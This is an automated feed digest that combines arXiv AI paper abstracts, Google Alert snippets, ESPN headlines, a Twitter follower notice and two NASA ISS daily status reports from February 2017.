Bilinear models provide rich representations compared with linear models. They have been applied in various visual tasks, such as object recognition, segmentation, and visual question-answering, to get state-of-the-art performances taking advantage of the expanded representations. However, bilinear representations tend to be high-dimensional, limiting the applicability to computationally complex tasks. We propose low-rank bilinear pooling using Hadamard product for an efficient attention mechanism of multimodal learning. We show that our model outperforms compact bilinear pooling in visual question-answering tasks with the state-of-the-art results on the VQA dataset, having a better parsimonious property.



from cs.AI updates on arXiv.org http://ift.tt/2ed1inE
via IFTTT

Dynamic Coattention Networks For Question Answering. (arXiv:1611.01604v3 [cs.CL] UPDATED)

Several deep learning models have been proposed for question answering. However, due to their single-pass nature, they have no way to recover from local maxima corresponding to incorrect answers. To address this problem, we introduce the Dynamic Coattention Network (DCN) for question answering. The DCN first fuses co-dependent representations of the question and the document in order to focus on relevant parts of both. Then a dynamic pointing decoder iterates over potential answer spans. This iterative procedure enables the model to recover from initial local maxima corresponding to incorrect answers. On the Stanford question answering dataset, a single DCN model improves the previous state of the art from 71.0% F1 to 75.9%, while a DCN ensemble obtains 80.4% F1.



from cs.AI updates on arXiv.org http://ift.tt/2exT6xr
via IFTTT

Cutting-off Redundant Repeating Generations for Neural Abstractive Summarization. (arXiv:1701.00138v2 [cs.CL] UPDATED)

This paper tackles the reduction of redundant repeating generation that is often observed in RNN-based encoder-decoder models. Our basic idea is to jointly estimate the upper-bound frequency of each target vocabulary in the encoder and control the output words based on the estimation in the decoder. Our method shows significant improvement over a strong RNN-based encoder-decoder baseline and achieved its best results on an abstractive summarization benchmark.



from cs.AI updates on arXiv.org http://ift.tt/2iJg8Vk
via IFTTT

Click Through Rate Prediction for Contextual Advertisment Using Linear Regression. (arXiv:1701.08744v1 [cs.IR] CROSS LISTED)

This research presents an innovative and unique way of solving the advertisement prediction problem which is considered as a learning problem over the past several years. Online advertising is a multi-billion-dollar industry and is growing every year with a rapid pace. The goal of this research is to enhance click through rate of the contextual advertisements using Linear Regression. In order to address this problem, a new technique propose in this paper to predict the CTR which will increase the overall revenue of the system by serving the advertisements more suitable to the viewers with the help of feature extraction and displaying the advertisements based on context of the publishers. The important steps include the data collection, feature extraction, CTR prediction and advertisement serving. The statistical results obtained from the dynamically used technique show an efficient outcome by fitting the data close to perfection for the LR technique using optimized feature selection.



from cs.AI updates on arXiv.org http://ift.tt/2jNkuNH
via IFTTT

Must visit

AnonymouS Bar: Must visit - See 707 traveler reviews, 333 candid photos, and great deals for Prague, Czech Republic, at TripAdvisor.

from Google Alert - anonymous http://ift.tt/2lIrsFW
via IFTTT

Feeld — Anonymous Invite

Feeld — Anonymous Invite - Invite your crush anonymously to Feeld.. (Dating and Tech)

from Google Alert - anonymous http://ift.tt/2lHZZEp
via IFTTT

Orioles' Chris Tillman likely to start season on DL after PRP injection in shoulder; team-best 16 wins in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous user 517a69

Name, Anonymous user 517a69. User since, February 14, 2017. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not ...

from Google Alert - anonymous http://ift.tt/2lMGEP7
via IFTTT

Ravens: Unrestricted free-agent NT Brandon Williams says future with team is "up in the air" - Sirius XM NFL Radio (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Eric S Burdon
Youtube host of Eric Burdon TV, Blogger, Life Coach. My goal is to help YOU! You can also support me on patreon: https://t.co/IM0PkBGiyv

https://t.co/WhcDXvBRBv
Following: 5954 - Followers: 11969

February 14, 2017 at 12:08PM via Twitter http://twitter.com/es_burdon

Anonymous notes show support for Pueblo police

Anonymous notes left on the vehicle of Pueblo police...

from Google Alert - anonymous http://ift.tt/2l4HkPN
via IFTTT

ISS Daily Summary Report – 2/13/2017

Electrostatic Levitation Furnace (ELF) Sample Clean: This morning the crew disconnected the Sample Cartridges from within the ELF to exchange the samples and retrieve lost samples within the sample holders.  The crew reinserted the cartridge and reconnected the hoses and cables.  Ground teams will resume checkout and operations later this week. The ELF is an experimental facility designed to levitate/melt/solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured, and solidification from deeply undercooled melts can be achieved. Tissue Regeneration-Bone Defect Rodent Research-4 (RR-4) Hardware Gather and Install: The crew gathered RR-4 hardware required prior to SpX-10 delivery of the experiment. Two of the four Rodent Habitats were installed this morning; however, ground teams are not receiving telemetry from either Habitat. Ground teams were able to recover after changing the IP address and reconnecting Health and Status. Tissue Regeneration-Bone Defect (RR-4 CASIS) studies what prevents vertebrates such as rodents and humans from regrowing lost bone and tissue, and how the microgravity extraterrestrial condition impacts the process. Results could lead to tissue regeneration efforts in space and a better understanding of limitations of limb regrowth at wound sites.  Microgravity Expanded Stem Cells (MESC) Life Science Ancillary Hardware (LSAH) Configuration: The crew gathered then setup the Microgravity Science Glovebox (MSG) Life Science Ancillary Hardware (LSAH).  MESC is being delivered by SpX-10 and will be initiated shortly after arrival. MESC will aid researches determine the efficiency of using a microgravity environment to accelerate expansion (replication) of stem cells for use in terrestrial clinical trials for treatment of disease. Phase Transitions-4 (PK-4) Video Monitor: The crew configured a video monitor in support of the joint ESA-Russia PK-4 experiment.  PK-4 is a scientific payload for performing research in the field of ‘Complex Plasmas’: low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other which can lead to a self-organized structure of the micro-particles: so-called plasma crystals. Experiments in the facility aim to study Transport Properties, Thermodynamics, Kinetics and Statistical Physics and Non-linear waves and Instabilities in the plasmas. Carbon Dioxide Removal Assembly (CDRA) Air Selector Valve (ASV) Remove and Replace (R&R): During troubleshooting last week, CDRA ASV 102 was identified as a source of the reoccurring Remote Power Controller (RPC) trips. Today, the crew replaced this valve as part of the troubleshooting process. The final ASV power configuration is now the same as we started with after the troubleshooting cable was initially installed – valves 101, 102, and 103 powered by the troubleshooting cable; valves 104, 105, and 106 powered by the original cable. The failed ASV 102 will be returned to the ground on SpX-10 for further testing and troubleshooting.  Solar:  Saturday, February 11, 2017 was the last day of the Solar Sun Visibility Window and last science measurements, before final switch off of Solar Wednesday, February 15.  All activities leading up to Saturday were successfully completed per schedule. The Solar instruments saw their last sunlight and the Solar platform performed its very last tracking after many thousands of tracking cycles over 9 years. More SOLSPEC calibrations are scheduled on Monday. The Solar platform will be powered off and removed for return on SpaceX-12. Solar is a monitoring observatory that will measure the solar spectral irradiance. Apart from scientific contributions for solar and stellar physics, the knowledge of the solar energy irradiance into the Earth’s atmosphere and its variations is of great importance for atmospheric modeling, atmospheric chemistry and climatology. The three experiments mounted on Solar are Solar Variable and Irradiance Monitor (SOVIM) observing the near-ultraviolet, visible and thermal regions of the spectrum (200 nanometers – 100 micrometers); SOLar SPECtral Irradiance Measurements (SOLSPEC) observing the 180 – 3000 nanometer range with high spectral resolution; and SOLar Auto-Calibrating Extreme UV/UV Spectrometers (SOLACES) measures the EUV/UV spectrum range (17 nanometers – 220 nanometers) with moderate spectral resolution.  Transition to (X2) R15 Software:  As part of the R15 software transition, the Guidance, Navigation, and Control (GNC) Multiplexer/Demultiplexer (MDMs) were transitioned to updated software today. Updates to the GNC MDMs include:  Add Portable Computer System (PCS) connectivity to docked vehicles Provide Visiting Vehicle (VV) interface for a VV with two processors communicating on different buses at each International Docking Adapter (IDA) location Rate Gyro Assembly (RGA) recovery should assure at least two rate sources are available Incorporate the Flight Software (FSW) Patch Loader Provide attitude recovery without using Russian data following a GNC checkpoint transition without Loss of Attitude Control (LoAC) The Command & Control (C&C) MDMs will be updated tomorrow. Updates to the C&C MDMs include: Visiting Vehicle Support Implement modified capability for loading patches Modification to Rapid Depress Auto-Response Dual Integrated Communications Unit (ICU) Capability Increase number of Telemetry Format Versions to meet VV Requirements Improvements to Longeron Shadowing Fault Detection, Isolation and Recovery (FDIR) response Robotic External Leak Locator (RELL) Operations: Mobile Servicing System (MSS) and RELL performed Radiator Beam Valve Module (RBVM) P1-3-2 scans Saturday and Sunday, in support of the investigation into an External Active Thermal Control System (EATCS) loop B leak. Friday night the Robotics Ground Controllers removed the RELL from the JEM airlock slide table. Saturday the Robotics Ground Controllers maneuvered the Space Station Remote Manipulator System (SSRMS) and Special Purpose Dexterous Manipulator (SPDM) Arm1 as required to perform the RELL Scan of RBVM. They performed in order, the Face, Aft Starboard, Aft Port, and Forward Scan of the P1-3-2 RBVM. At the end of the ops on Saturday, SSRMS and SPDM were positioned at park position, ready to resume and complete the scan survey Sunday. Sunday, the Robotics Ground Controllers maneuvered the SSRMS and SPDM Arm1 to perform an additional “focused re-inspection” RELL Scan of RBVM P1-3-2 from the aft starboard side. They then maneuvered the SSRMS and SPDM to place the RELL back in the Japanese Experiment Module (JEM) Orbital Replaceable Unit (ORU) Transfer Interface (JOTI) on the […]

from ISS On-Orbit Status Report http://ift.tt/2ksZNUe
via IFTTT

ISS Daily Summary Report – 2/10/2017

Japanese Experiment Module (JEM) ORU Transfer Interface (JOTI) and Robotics External Leak Locator (RELL) Installation on JEM Airlock (JEMAL) Slide Table: The crew installed the JOTI on the JEM A/L Slide Table. Afterwards, the crew installed the Robotics External Leak Locator (RELL) onto the JOTI, and retracted the Slide Table inside the JEMAL.  RELL operations are scheduled for this weekend to try and locate the source of the ammonia leak on External Active Thermal Control System (EATCS) Loop B. JEM Pressurized Module (JPM) Thermal Control Assembly (TCA) Accumulator Package Remove & Replace (R&R): Today, the crew replaced the JPM TCA Accumulator package. They disengaged Cabin Ducts and rotating the Environmental Control Life Support System / Thermal Control System (ECLSS/TCS) rack. They then removed the Accumulator Package and installed a spare. After mating the rack umbilical and attaching the accumulator, they rotated the rack and engaged the Cabin Ducts. The removed Accumulator Package was packaged for return to the ground.  Packed Bed Reactor Experiment (PBRE) Removal: The crew removed the PBRE from the Microgravity Science Glovebox (MSG) and packed it for return on SpX-10. The PBRE investigation studies the behavior of gases and liquids when they flow simultaneously through a column filled with fixed porous media. The porous media or “packing” can be made of different shapes and materials and are used widely in chemical engineering as a means to enhance the contact between two immiscible fluid phases (e.g., liquid-gas, water-oil, etc.). Packed columns can serve as reactors, scrubbers, strippers, etc. in systems where efficient interphase contact is desired, both on Earth and in space.  Fluids Integrated Rack (FIR) Light Remove & Replace: The crew translated the Optics Bench out in the FIR rotating it to 60°. They then removed and replaced both FIR White Light Lamps in the FIR White Light Chassis on the back of the Optics Bench. The Optics Bench was then rotated back to vertical position and translated into the rack. The White Light Lamps were close to their expected end of life, and to prevent a burn out during the Light Microscopy Module (LMM) Biophysics experiment, which is arriving on SpaceX-10 (SpX-10), the light was changed out early. LMM Biophysics 1 (The Effect of Macromolecular Transport of Microgravity Protein Crystallization) will launch on SpX-10. When installed, investigators will use the results from LMM Biophysics 1 to examine the movement of single protein molecules in microgravity. By studying the crystals of a higher quality that can be grown in microgravity, scientists will be able to better understand their structure and how they work.  48 Soyuz (44S) Emergency Egress Drill: The crew participated in an emergency decent drill. This training session focused on off-nominal procedures that would be used in the event the crew needs to egress the ISS and perform an emergency descent. The drill is scheduled when the crew has been aboard the ISS for 12-14 weeks, then once every 2.5 months.  Mobile Servicing System (MSS) Operations: Overnight, Robotics Ground Controllers powered up the MSS and walked the Space Station Remote Manipulator System (SSRMS) off the Node2 Power Data Grapple Fixture (PDGF) and onto Mobile Base System (MBS) PDGF1. They then unstowed the Special Purpose Dexterous Manipulator (SPDM) from MBS PDGF2 and maneuvered the SSRMS (holding the SPDM) to a translation configuration.  Finally, Ground Controllers translated the Mobile Transporter (MT) from Worksite #4 (WS4) to WS7.  The MSS is now in position for the start of the Robotic External Leak Locator (RELL) operations scheduled to begin this afternoon.  Treadmill 2 (T2) Secure Digital (SD) Card Recovery – On February 9th T2 was declared non-operational.  The ground teams were not successful in performing the nominal weekly powercycle and later on that day crew was unable to get the T2 treadbelt to spin.  T2 had been operating in debug mode, due to previous anomalies, which increased the amount of data files stored on the SD card.  Teams determined that yesterday’s failed powercycle was due to the SD card being too full.  In order to recover T2, crew and ground teams executed a successful recovery of the SD card and unmanned activation and checkout. T2 is GO for operations. Extravehicular Activities (EVA) Pistol Grip Tool (PGT) Torque Analyzer Kit (TAK) Data Gather: The crew installed the TAK onto each of the PGTs and recorded their torque output for ground analysis. This activity is part of a 6-month requirement for all on-orbit PGTs.   Today’s Planned Activities All activities were completed unless otherwise noted. Video for Russia Today TV Channel DUBRAVA. Observations and photography Preparation of Reports for Roscosmos Web Site and Social Media EKON-M. Observations and photography Inventory Management System (IMS) conference Treadmill 2 (T2) SD Card Recovery Fluids Integrated Rack Doors Open JEM Cabin Duct Disengagement RELAKSATSIYA Hardware Setup Glisser-M Video Battery (2) Charge (GoPro HERO3 No.6):  setup and initiate battery charge Crew will bag Actiwatches on the HRF Rack 2 front and stow for return. VIZIR. Experiment set up and start using СКПИ P/L Crew will access and save the VUE error logs for drives E and F by using the MSG laptop БД-2 control panel software installation JEM Airlock Slide Table (ST) Extension to JPM Side JEM Airlock (AL) Slide Table Passive Capture Mechanism Removal JPM TCA L Accumulator Package R&R RELAKSATSIYA. Parameter Settings Adjustment Structures and Mechanisms JEM ORU Xfer I/F and Robo Ext Leak Locator Installation RELAKSATSIYA. Observation RS2, RS3 Laptops Inspection And Cleaning RELAKSATSIYA. Closeout Ops and Hardware Removal СОЖ maintenance Fluids Integrated Rack Rack Doors Close Glisser-M Video Battery (2) Charge (GoPro HERO3 No.6):  Terminate charge and stow RS1 Laptop Inspection and Cleaning Structures and Mechanisms (S&M) JEM ORU Xfer I/F (JOTI) and Robo Ext Leak Locator (RELL) Assist 1 JEM Airlock Slide Table (ST) Retraction from JPM Side SEISMOPROGNOZ. Cable Disconnect from Autonomous Temperature Monitoring Module [МАКТ] Х4 cnctr JEM Airlock Depressurization Meteor hard drive swap Space Headaches – Weekly Questionnaire JEM ECLSS/TCS1 Rack Umbilical Mate SEISMOPROGNOZ. Cable 17КС.42Ю -8242А-9130 Disconnect from Х4 МАКТ SEISMOPROGNOZ. Removal of [МАКТ] unit and Control and […]

from ISS On-Orbit Status Report http://ift.tt/2lcCGBP
via IFTTT